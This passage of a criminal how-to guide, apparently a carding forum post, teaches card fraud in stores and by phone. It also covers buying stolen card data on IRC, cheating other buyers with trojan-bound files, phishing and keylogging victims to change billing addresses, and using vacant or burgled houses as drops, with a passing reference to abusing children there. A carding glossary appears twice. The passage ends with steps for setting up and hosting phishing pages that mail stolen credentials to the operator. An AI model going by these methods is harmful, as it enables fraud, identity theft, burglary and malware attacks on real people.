+the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you
+go in, don't rush take your time, browse around some other items. Find the item you want to card and
+even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain
+specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as
+normal as you always have been, don't make too much small talk but be polite and civil. Once you have
+the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door,
+get to your car and then celebrate all you want.
+Carding over the phone
+Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you
+could use a beige box and call from someone else's phone but that's a totally different game all together
+and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple
+and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the
+year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though
+. The next day postage is said so that they have less time to look up details on the order. Some cards will
+have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start
+to question you then just answer the questions and talk your way around the situation with your social
+engineering skills; don't just run away from the questions or hang up straight away, otherwise that is
+cause for suspicion and they may investigate. If all goes well you should have your item of choice
+delivered to your drop location or a house of someone else's address who you don't know and call them
+up saying that you called up the store and they've sent the package to the wrong address and it is still
+sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after
+
+work (this is a last resort and only to be tried if you're good at talking to people, which you should be if
+you're a carder). I recommend checking out the section on drops later on in this text.
+I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send
+without some verification which is usually the case).
+IRC
+Services provided in IRC
+IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE
+black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off
+IRC from CP to warez to CC details (which is what we want).
+To concentrate on carding though you can buy:
+CVVs
+CVV2s
+SSNs
+Utility bill scans
+CC scans
+COB (a service to get someone to call up the victim's bank and get the billing address changed to your
+drop)
+Payment for using someone else's drop and then sending to you
+Spyware
+Fake ID/ ID scans
+DUMPZ
+Phisher pages
+The list really is endless
+There are a lot of advantages to using IRC networks and channels which I'll go into now:
+- The channels are often underground and not known to many people, so they're harder to stumble upon
+by some random guy.
+- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing
+the traffic. This makes it harder for investigators to uncover.
+- Easier and quicker to communicate with mass amounts of like minded people.
+- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made
+every second, guaranteed).
+- And of course a varity of services, if you need something you can bet someone from the other side of
+the world will be willing to share or/and sell to you.
+There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you
+stay cautious, here's what you should be weary of:
+- Viruses
+- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and
+NOD32 are what you want)
+- Do not accept random .exes or any file for that matter
+- It is easy to get ripped off, choose your forms of payments and who you deal with wisely
+How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find
+these channels?
+If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is
+
+where I found out about a lot of the carder channels I used, also how I found out about forums and their
+IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I
+was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh
+about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his
+type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with
+him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of
+Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself
+under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd
+got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get
+invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone,
+I was banned for ripping (I didn't rip anyone :angry
+The quicker way is to use these and search for certain keywords:
+Code:
+http://www.irclinux.org
+http://www.irctrace.com
+http://www.irclog.org
+http://www.rcarchive.info
+http://www.irc-chat-logs.com
+http://www.irseek.com/
+And of course don't forget google.
+I'm only going to give you one clue for searching through google for a carding IRC, and that word is
+"undernet".
+Fellow carders don't like revealing their IRCs, and for obvious reasons.
+My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow
+fraudster.
+Vendors and how to approach them
+Vendors are the people in IRC who are selling and providing the services for you. There are certain ways
+you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is
+just like going up to a random drug dealer in the street and not knowing what you really want or what
+you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if
+you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase
+somewhere; they should show you a before and after and the limits that are there on the card [there are
+methods out there of checking your balance; you can even get it through text/sms]. This is a market so
+remember there are more people that will be willing to buy from that vendor, it's open for all, you can get
+a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying
+higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit
+higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the
+billing address through the bank to where ever your drop is.
+Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors
+are saying they have to offer and then send them a private message and talk to them. If any "vendor"
+messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however
+don't piss off the rippers or assume someone is a ripper because you never know who is going to be there
+to help you out later on down the line or who might be pissed off enough to fuck you over.
+I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in
+there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just
+don't go to them again, because if they get away with it once they'll definitely try again if you go back to
+them).
+DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit.
+
+The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing
+or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as
+$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going
+to be installed on your machine while you get some useless program that does nothing.
+Ripping
+Easy as hell to do, not much photoshop skills needed really either.
+Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit
+card gen program; of course they don't fucking work), if they want to see proof just use your own legit
+CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the
+details to that which you're going to be giving him later. Take payment through Western Union ONLY
+(since e-gold isn't around anymore), then just send him the bullshit info.
+If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying
+some bullshit reports. Then get the payment via WU.
+To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers
+(look for ones requesting).
+::::WU BUG::::
+seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are
+actually making quick programs themselves and taking screens of them and then selling them, although
+essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind
+a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info
+you get from spying on them will be so much more as well ranging from their info to other stolen CC
+info, you'll have a backdoor on what they do and can exploit it.
+If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get
+them to show you pics, vids and info; then use it for yourself and rip some n00bs.
+Phishing for Change of billing
+A billing address is the details used for a person's bank account and most often their credit cards and
+everything else too, this includes their phone number too.
+What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to
+your drop address you're gonna be using. When you want to card BIG at various online websites the
+orders will look more legit that you're not sending it else where other than the one registered to the card
+(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker
+and will require a lot less verification.
+Most of the time you change the billing address over the phone but SOME banks will let you do it online;
+when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going
+to be using when carding, or beige boxing
+When changing the billing address you need to know as much info as possible about the person's billing
+address you're changing, because the bank is going to ask you 3 security questions you set (such as
+mother's maiden name) before they change it.
+You can phish for details over the phone (see the phishin over the phone section above), however it's best
+to use keyloggers and phisher pages for this with a MIX of over the phone.
+Use through phishing pages
+2 methods here, 1 including over the phone, one isn't.
+The method without the phone is to just send a ton of e-mails out to random people and send them a html
+
+e-mail telling them they need to update their information before the account is suspended or their account
+with the bank will be cancelled, you have them go to a phisher page off the template and the phisher
+pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you
+know those type of questions.
+Another method is to call them up pretending to be the bank and saying there have been different ip
+ranges logging on their account and they need to confirm their details online, link them to the phisher
+page and have them fill in the details; have the phisher page redirect to the actual online bank's login
+page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check
+it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers
+to their secret questions which you can give to the bank itself when you go to change the billing address.
+Use through keylogging
+This is my favourite method and what I told S_E last night in IRC.
+You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into
+their online bank account and then change their password, call them up pretending to be the bank and then
+get them to go to the actual online bank link and fill in their forgotten password options (answering secret
+questions) or of course get them to go to your phisher page and fill in the details (this is if you want to
+add more fields to get more info) then pretend to be checking it all over, then change their password again
+to some random letters and numbers and give it to them to log back in (it doesn't matter because they're
+keylogged and you'll get their new login if they change the password again anyway), you'll have all their
+info logged down too for you to answer your questions when you call the bank.
+Best time to do all of this is around the 10th day of the month (people usually get their credit reports at
+the start of every month), this will give you plenty of time to card enough for the remaining days until
+they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have
+cancelled the online bank account for them after they've gave you the info you need to know; I used to do
+this method and keep it going without them knowing).
+You need as much info as possible when calling up the bank to change the billing address.
+Drops and what you need to know about them
+Drops and what you need to know about them
+What drop locations are and what they?re used for
+Well simply a drop location is an abandoned house, or any house that is not under your name or any of
+your details. You can lead young children into these to make a sexy time with them, get items delivered to
+them that you want no one else to find about or risking finding, or just use it to squat in if you have no
+where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam
+artists and sex offenders.
+How to find a drop location
+There are many ways of finding a drop location for use, whether it temporarily or permanently (although I
+suggest swapping and changing locations because my main last one I used got raided or broken into and
+is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use.
+One final tip is don?t bother going for houses that are boarded up at the front where it is visible to passers
+by (it?s okay if round the back is boarded up)
+Way #1
+As just mentioned you can go about it many different ways but one of the ways the way I prefer to go
+about it is you should be looking around some older housing estates and more ghetto areas (could also tie
+in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in
+Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin.
+Old Sinfin is the are you would want to go to, because it?s older it?s most likely to be alot more houses
+abandoned or deemed unsafe (it?s bullshit).
+
+Or if you were lucky like I once were then you could ask around your mates if there are any empty houses
+in their area. If there are then you?re in luck and can even have your friend keep tabs and watching over it
+for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with
+neighbour hood watch morons, and nosey neighbours, but it?s still ideal and a little bit less suspicious
+than the abandoned houses in the older estates, and this is because the older estates usually have all
+abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will
+seem less suspicious to the postman.
+Way #2
+Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of
+getting what you need but has a bit more risk to it; and personally is a way I have never used even till
+today.
+Have you ever been eavesdropping on a conversation between a neighbour and one of their family
+member?s or friends?, or been down the pub and heard the common as muck chavs boasting about a
+holiday they are going away on for however long they say they?re going away for?
+Well listen out for these type of conversations. Because them away on holiday means the house is most
+likely going to be empty for however long they?re going away for. So if you already know where they
+live then that?s great the job is made easier; if you know their first name and surname then look them up
+in the phone directory and find their address to go along with the number. If you don?t know where they
+live, or their name then just listen out to see if you can hear their names come up in conversation; just
+remember that if it?s in the pub it?s most likely local to it that they live, so you could easily find out by
+following them home and seeing.
+Way #3
+Possibly the safest, easiest way of finding, and quickest way to get a drop location.
+Most areas have houses up for sale am I right?
+Or houses that are up for bidding on, am I right?
+Well they have a website with a full list of your local area(s) that have houses up for bidding on and for
+sale.
+For example I would search Derbyhomefinders and look at the list on their site.
+All of these houses are empty and often do not have a sign up outside them either (if they do then just
+take it down and hide it somewhere for the time being).
+The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or
+if the house has been sold (this lets you know that it will not be ideal to use that certain house now it?s
+most likely to be inhabited) and will have the houses on there that are still being bidded on and that are
+still up for sale, these are the ones you want to be using.
+The best thing about this though is that you have a full list of many different drops to use (like I said
+earlier it?s best to switch drop locations and use many different ones) and it is updated with new ones
+coming up and tells you full which ones are over and not usable.
+You just need to know your agencies for housing and find their website.
+Obtaining and using drop locations
+You?re probably thinking now I?ve got/found one that?s great and everything but how the fuck do I keep
+it a secret?
+for way 1
+
+this much is obvious that you do not tell anyone except your partner if you?re doing a team bait, and 1
+trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only
+when he asks. But there is alot more to it than that, also maintaining your abandoned house and making
+the postman think someone living there.
+Appearance isn?t everything at all in any case and it isn?t for this either, but of course you try to make
+yourself look as best as you can. The same principles are applied to keeping an abandoned house; you
+should atleast try to get a new lock put on the door which you will also have a key for; just so that if any
+druggies go there before you then they will have a tougher time getting in (of course it?s ideal you don?t
+get somewhere known to druggies but this is an example of what use it could have) but also if there is a
+fucked up lock on a door then it?s pretty damn obvious only low life scum or some criminal(s) are using
+the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance
+from a friend who knows what they are doing.
+Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use
+a lawn mower, use clippers and hack it as short as you can. It?s best to get all of this done when everyone
+is at work during the day time; but in reality it isn?t ideal at all and most criminals don?t tend to bother
+with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or
+is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the
+floor near the door saying something such as "No milk today please" or "Not in, please leave packages at
+post office".
+Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look
+like you get mail and not just the one off suspicious package now and then.
+Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while
+acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your"
+garden) or you can leave a note saying to take any packages to the post office for pick up because you are
+at work or something along those lines.
+One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a
+week.
+Way 2
+Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit
+just before the postman arrives and be at the house outside pretending you?re just about to leave and then
+sign for the package (if you need to) and collect it off the postman and then be on your way after he?s
+gone. Or if you?re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then
+you could bump key in at night time (not recommended) or during the day time the day before when
+everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in
+the fridge and feed yourself since you?re spending the rest of the day and early morning there). Basic
+rules are don?t have tv on too loud if at all, or if you do then put head phones on into the tv if it?s that old
+of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone
+looking after the house while the owners are away come in then you have time to hide.
+Obviously if it?s a package you don?t have to sign for then you can stick up a note on the door early in
+the morning before the post man comes saying to leave it round the back or what ever excuse you wanna
+make up.
+Way #3
+Easy, just as previously except you don?t have to be as cautious and often the alarms are disabled for that
+time being anyway so you don?t have to worry as much if you bump key into it.
+As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down
+and just get them out of the way.
+
+You can even go to this one the night before instead of day time because no one is hardly going to be
+watching over this unless it?s in a neighbourhood watch area (in which case you chose the wrong area
+anyway, you dumbass).
+Some basic tips to keep in mind
+-- Be there before the postman! can?t stress this enough, it?s too fucking obvious if you?re late.
+-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake
+shit) with your hand that you don?t write with, so it?s harder to trace incase things go tits up later on
+down the line.
+-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your
+situations; guides are to b
+Carding Vocabulary/Chat
+-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is
+with 4 digits (some RARE times with 3)
+-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits
+-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits
+-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits
+(some RARE times with 4)
+-------------------------------------------------------------------------
+Bank-emitent (Issuing bank) - bank which has issued the card
+Billing address - the card owner address
+Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the
+earnings to you.
+Biling - office, which has agreement with a bank. Also this office assumes payments for the cards.
+Card bill - it's a Bank emitent card bill.
+Bank-equirer - bank, in which the store opens the account.
+Merchant account - bank account for accepting credit cards.
+Merchant Bank - bank, through which occur the payments between the buyer and the salesman
+(frequently it is used as synonym "bank-equirer").
+Cardholder - owner of the card.
+Validity - suitability card using.
+White plastic - a piece of the pure plastic, where the information is plot.
+CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card
+
+with the magnetic strip.
+Transaction - charege to the credit card
+POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point.
+PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By
+simple words password for the work with ATM and so on.
+AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its
+holder.
+"Globe" - card holographic gluing with the image of two hemispheres (MasterCard).
+Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA).
+Reader - information reading device for the readout from the magnetic strip of card.
+Encoder - read/write device for the magnetic track of the card.
+Embosser - card symbol extrusion device.
+Card printer - card information printing device.
+Exp.date - card validity period.
+Area code - the first of 3 or 6 numbers of the card owner phone.
+CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card.
+ePlus - program for checking the cards.
+BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card
+and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix".
+Chargeback - the cardholder's bank voids the removal of money from its card.
+Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks.
+Track (road) - a part of the dump with the specific information. Every 1-st track is the information about
+the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card,
+etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other.
+Slip - synonym to the word "cheque" (conformably to card settlings).
+Card balance - money sum that finding on the card account.
+MMN Mothers Maiden Name, important if you want to change the billing address
+some terms:
+Automated Clearing House (ACH) - the automated clearing house. The voluntary association of
+depositors, which achieves clearing of checks and electronic units by the direct exchange of means
+between the members of association.
+Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production
+guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the
+
+design, development, production, servicing and the propagation of the production.
+Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize
+direct buyer account debiting at the moment of the purchase of goods or service.
+Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers,
+which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment
+and at the moment of payment.
+Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.)
+with which the debitor authorizes his financial establishment to debit his current account when obtaining
+of calculation on payment from the indicated creditor.
+Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or
+magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that
+concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale -
+EFT/POS).
+Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means
+transfer purpose from the account of a buyer into the payment on the obligations, which arose in the
+course of transaction at the point of sale.
+Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several
+computer micros-chip or integrated microcircuits for identification and storing of data or their special
+treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for
+delivery of permission for the purchase, account balance checking and storing the personal records. In
+certain cases, the card memory renewal during each use (renewed account balance).
+Internet - the open world communication infrastructure, which consists of the interrelated computer
+networks and which provides access to the remote information and information exchange between the
+computers.
+International Standardisation Organisation (ISO) - International organization, which carries out
+standardization, with the staff office in Geneva, Switzerland.
+Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the
+information, substituted by magnetic inks in the lower part of the check, including the number of check,
+the code of department, sum and the number of account.
+RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and
+Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently
+by the company Security Dynamics Technologies, Inc.
+Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved
+for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment.
+SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary
+purpose is to track individuals for taxation purposes.
+Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the
+calculations.
+System risk - the risk, with which the incapacity of one of the payment system participants either
+financial market participants as a whole to fullfill their obligations causes the incapacity of other
+participants or financial establishments to fulfill its obligations (including obligations regarding the
+realization of calculations in means transfer systems) properly. This failure can cause significant liquidity
+
+or crediting problems and, as result, it can cause loss to the stability of financial markets (with the
+subsequent action on the level of economic activity).
+Truncation - procedure, which makes it possible to limit the physical displacements of a paper document,
+in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of
+entire or part of the information, which is contained on this document (check).
+Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card
+embosser)
+COB - Change of billing. Used for online carding, to change the billing address of a card since Online
+Stores will only ship large items if the billing and shipping address match. You can obtain these from
+vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the
+stores ship items to your drop, since the billing and shipping addresses will match.
+DOB - Date of birth of the card owner
+Carding Vocabulary/ TERMS
+-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is
+with 4 digits (some RARE times with 3)
+-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits
+-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits
+-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits
+(some RARE times with 4)
+-------------------------------------------------------------------------
+Bank-emitent (Issuing bank) - bank which has issued the card
+Billing address - the card owner address
+Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the
+earnings to you.
+Biling - office, which has agreement with a bank. Also this office assumes payments for the cards.
+Card bill - it's a Bank emitent card bill.
+Bank-equirer - bank, in which the store opens the account.
+Merchant account - bank account for accepting credit cards.
+Merchant Bank - bank, through which occur the payments between the buyer and the salesman
+(frequently it is used as synonym "bank-equirer").
+Cardholder - owner of the card.
+Validity - suitability card using.
+
+White plastic - a piece of the pure plastic, where the information is plot.
+CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card
+with the magnetic strip.
+Transaction - charege to the credit card
+POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point.
+PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By
+simple words password for the work with ATM and so on.
+AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its
+holder.
+"Globe" - card holographic gluing with the image of two hemispheres (MasterCard).
+Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA).
+Reader - information reading device for the readout from the magnetic strip of card.
+Encoder - read/write device for the magnetic track of the card.
+Embosser - card symbol extrusion device.
+Card printer - card information printing device.
+Exp.date - card validity period.
+Area code - the first of 3 or 6 numbers of the card owner phone.
+CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card.
+ePlus - program for checking the cards.
+BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card
+and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix".
+Chargeback - the cardholder's bank voids the removal of money from its card.
+Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks.
+Track (road) - a part of the dump with the specific information. Every 1-st track is the information about
+the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card,
+etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other.
+Slip - synonym to the word "cheque" (conformably to card settlings).
+Card balance - money sum that finding on the card account.
+MMN Mothers Maiden Name, important if you want to change the billing address
+some terms:
+Automated Clearing House (ACH) - the automated clearing house. The voluntary association of
+depositors, which achieves clearing of checks and electronic units by the direct exchange of means
+between the members of association.
+
+Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production
+guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the
+design, development, production, servicing and the propagation of the production.
+Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize
+direct buyer account debiting at the moment of the purchase of goods or service.
+Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers,
+which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment
+and at the moment of payment.
+Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.)
+with which the debitor authorizes his financial establishment to debit his current account when obtaining
+of calculation on payment from the indicated creditor.
+Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or
+magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that
+concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale -
+EFT/POS).
+Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means
+transfer purpose from the account of a buyer into the payment on the obligations, which arose in the
+course of transaction at the point of sale.
+Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several
+computer micros-chip or integrated microcircuits for identification and storing of data or their special
+treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for
+delivery of permission for the purchase, account balance checking and storing the personal records. In
+certain cases, the card memory renewal during each use (renewed account balance).
+Internet - the open world communication infrastructure, which consists of the interrelated computer
+networks and which provides access to the remote information and information exchange between the
+computers.
+International Standardisation Organisation (ISO) - International organization, which carries out
+standardization, with the staff office in Geneva, Switzerland.
+Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the
+information, substituted by magnetic inks in the lower part of the check, including the number of check,
+the code of department, sum and the number of account.
+RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and
+Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently
+by the company Security Dynamics Technologies, Inc.
+Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved
+for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment.
+SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary
+purpose is to track individuals for taxation purposes.
+Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the
+calculations.
+System risk - the risk, with which the incapacity of one of the payment system participants either
+
+financial market participants as a whole to fullfill their obligations causes the incapacity of other
+participants or financial establishments to fulfill its obligations (including obligations regarding the
+realization of calculations in means transfer systems) properly. This failure can cause significant liquidity
+or crediting problems and, as result, it can cause loss to the stability of financial markets (with the
+subsequent action on the level of economic activity).
+Truncation - procedure, which makes it possible to limit the physical displacements of a paper document,
+in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of
+entire or part of the information, which is contained on this document (check).
+Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card
+embosser)
+COB - Change of billing. Used for online carding, to change the billing address of a card since Online
+Stores will only ship large items if the billing and shipping address match. You can obtain these from
+vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the
+stores ship items to your drop, since the billing and shipping addresses will match.
+DOB - Date of birth of the card owner
+Reply With Quote
+Casino Scam
+1. Design/Getting a scam page
+So to start you will need a decent scam page, one that looks life the real deal a
+nd will fool people into entering there details. Scam pages come in diffent forms
+and sizes from a single page to multiple ones but as long as yours is accurate it
+should work well. I have seen many scam pages or spam mail with countless spelling
+and grammar mistakes, I advise everyone to use a spell checker and read through it a few times, if your
+the language you are using is bad then ask someone who is
+fluent in that language to check it.
+Designing your own scam page:
+I do not know much about designing your own apart from the basics, there are
+others who are advanced and can add things like security lock and incorrect entry errors
+but for now you should start off with basic stuff.
+1. Go to the webpage that you are wanting to replicate.
+2. File, view source, notepad or similar program should open with alot of text.
+3. Save somewhere safe and close.
+4. Open and copy the source to a web design program, i would suggest
+'Microsoft Front Page Editor' as it can be downloaded for free and is easy to use.
+5. Edit the webpage to suit your needs.
+6. Go back to the source and now you will have to edit a few lines of it so
+that the entires are sent to you ( I cannot at this time remember what lines
+to edit so i will edit this shortly)
+Or to make the above a little bit more easier, you can download the following
+
+program and rip an entire site for you to play around with in your choosen
+web design program..
+BlackWidow - http://sbl.net/Downloads/BlackWidow%20Setup.exe
+It has a 30 day trial restriction but a quick net search and you should be
+able to get a crack.
+Using free scam pages:
+Here are some free scam pages, thanks to Magister and blacksabbath who
+spent time creating them and gave them away at no cost, they are pretty
+decent and should work well. There are full versions of the e-gold and
+paypal scam page so if you would like that you can buy them
+off Magister.
+E-gold - http://www.glcco.com/invision/source...old%20LITE.zip
+Paypal - http://dataonesoftware.com/html/them...les/PayPal.zip
+eBay - coming soon
+AOL - http://blacksabbathpagez.tripod.com/aolsc.zip
+BankOne - http://blacksabbathpagez.tripod.com/bankone.zip
+Copy and past the links into a new browser as hotlinking might not work.
+The files are zipped so use winrar or a similar program to unpack them.
+Buying scam pages:
+You can by very proffesional scam pages from a few vendors, price varies on how
+good the page is, some vendors i would suggest are:
+Magister (CP)
+Aphrodite (CP)
+1.1 Setting Up Scam page (Getting details sent to email, icq etc)
+To make the details get sent to you, you will have to edit a few lines in one
+file which has to be done to the ones you are using. In the files specified
+below find the line mail("you@you.you") and change the part in brackets
+to your email.
+E-gold - access.htm is the start page, set mail address at acct.php
+Paypal - login.html is the start page, set mail address at paypal.php
+eBay - coming soon
+AOL - aol.comsupport is start page, set mail address at process.php
+BankOne - SecurityUpdate is the start page, edit same line when viewing source
+
+on SecurityUpdate
+1.2 Hosting Scam page
+You will need to find a stable anon host which will allow you to keep your
+scam page up for a few days, most hosts will take it down as soon as they
+notice or get complaints about it so choosing a good host is important.
+OffShore Hosts -Look for a host that is situated in a different country
+as they do not really care what it is used for and have slow/weak spam and
+fraud control, offshore hosts are always good for this sort of work.
+Radmins - If you have some spare money i would suggest ivesting in one or
+two radmins, radmins are computers you have full remoute access to so you
+can do whatever you want with them. A radmin with a good speed can do
+many things from hosting to spamming and browse for them so they are good
+investment for scam page users. Radmins can last for a long time depending what
